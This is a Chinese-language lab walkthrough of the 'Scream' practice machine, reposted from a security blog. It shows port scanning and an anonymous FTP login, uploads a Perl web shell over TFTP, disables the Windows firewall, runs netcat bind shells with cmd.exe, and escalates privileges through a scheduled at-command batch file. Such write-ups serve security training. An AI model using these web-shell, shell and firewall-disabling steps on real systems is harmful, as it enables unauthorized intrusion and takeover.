scream靶机保姆级教学

admin
admin
admin
138633
文章
114
评论
2025年2月20日19:32:20评论11 views字数 1971阅读6分34秒阅读模式

一、扫描靶机ip

arp-scan -l
scream靶机保姆级教学

靶机ip为192.168.55.152

二、端口扫描、目录扫描、指纹识别

2.1端口扫描

nmap -p- 192.168.55.152
scream靶机保姆级教学

发现ftp、ssh、telnet服务开放,等等可以进行尝试

2.2目录扫描

dirb http://192.168.55.152
scream靶机保姆级教学

发现没有扫描出敏感目录,进入靶机网站没有发现有用的信息,感觉该靶机要从ftp服务入手

scream靶机保姆级教学

2.3指纹识别

nmap 192.168.55.152 -sV -sC -O --version-all
scream靶机保姆级教学

三、拿到低权限用户

3.1ftp服务尝试

nmap扫描的结果显示21端口可以使用ftp默认账号密码登陆

ftp 192.168.55.152

注:ftp默认账号:anonymous 密码:guest

scream靶机保姆级教学

进入之后发现三个文件夹,尝试打开文件夹查看里面的具体内容

可以查看文件夹,但是不能下载文件(提示没权限)

但是root目录下面的cgi-bin目录可以下载,里面是空白的

我们知道此目录是网站用于存放 CGI 脚本和gui程序,说不定可以进行文件上传然后反弹shell,先留在这,继续寻找其它信息

21端口至此没有可以利用的地方,换下一个试试

3.2ssh服务尝试

此靶机的ssh版本太老了,需要添加参数才可以进行连接

ssh -l root 192.168.55.152 -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-dss -oCiphers=+3des-cbc

但是需要root用户的密码,失败

3.3telnet服务

此服务也需要密码,GG

scream靶机保姆级教学

至此,本靶机扫描出来的端口全部尝试,均失败

3.4获得新端口

namp默认使用TCP扫描,扫描不出来UDP端口,这里使用参数-sU进行UDP扫描,发现端口:69

nmap -sU -p- --min-rate 10000 192.168.55.152(靶机扫描较慢,更改参数使其快一点)
scream靶机保姆级教学

发现靶机还开启了tftp服务

补充:

TFTP 设计初衷是为了在网络中进行简单、轻量级的文件传输,相较于 FTP(File Transfer Protocol),它的功能较为有限,但实现起来更为简单,占用资源少,通常用于在设备之间快速传输小文件,如在网络设备(如路由器、交换机)启动时从服务器获取配置文件。

常用命令:

上传:put

下载:get

binary 二进制传输命令,传输模式切换为binary,和ftp类似

退出:quit

使用tftp进行连接

scream靶机保姆级教学

连接成功

此时我们可以上传gui程序,文件下载:https://github.com/rafalrusin/web-shell

先将web-shell.pl文件下载到桌面上,再使用以下命令进行上传

put web-shell.pl cgi-bin/cgi_webshell.pl

上传之后访问:http://192.168.55.152/cgi-bin/cgi_webshell.pl?password=yourpassword

scream靶机保姆级教学

使用dir命令,发现可以成功使用

scream靶机保姆级教学

随后我们查看一下靶机的防火墙有没有开

netsh firewall show state
scream靶机保姆级教学

发现防火墙是开启的,我们尝试关闭防火墙然后上传木马

net stop sharedaccess
scream靶机保姆级教学

后面发现使用tftp上传可执行文件,必须将传输模式切换为binary,否则tftp会上传纯文本,重新上传shell

将nc上传至靶机(nc下载地址:https://eternallybored.org/misc/netcat/)

tftp 192.168.55.152
binary                    
put nc.exe cgi-bin/nc.exe
scream靶机保姆级教学
以下命令在网页中执行
nc -lvvp 4444 -e C:WindowsSystem32cmd.exe

以下命令在kali中重新开一个终端执行
nc 192.168.55.152 4444
scream靶机保姆级教学

成功拿到shell

四、at命令提权

查看当前用户

echo %username%

查看用户列表和主机名

net user
scream靶机保姆级教学

说明该用户本身具有较高的权限

查看系统

systeminfo
scream靶机保姆级教学

查看用户权限

net user alex
scream靶机保姆级教学

由于alex用户在Administrators组中,大概率有权限使用at命令

之前我们上传了nc.exe,现在只需要利用at命令设置一个定时任务,执行nc命令即可,在kali中创建一个.bat脚本,命名为:2.bat

脚本内容:

@echo off
c:wwwrootcgi-binnc.exe -lvvp 8888 -e C:WindowsSystem32cmd.exe

将脚本上传到cgi-bin目录中

在网页中输入以下命令:

at 15:01 "c:wwwrootcgi-bin2.bat"
scream靶机保姆级教学

提权成功!

原文始发于微信公众号(泷羽Sec-pp502的安全笔记):scream靶机保姆级教学

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月20日19:32:20
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   scream靶机保姆级教学https://cn-sec.com/archives/3764972.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息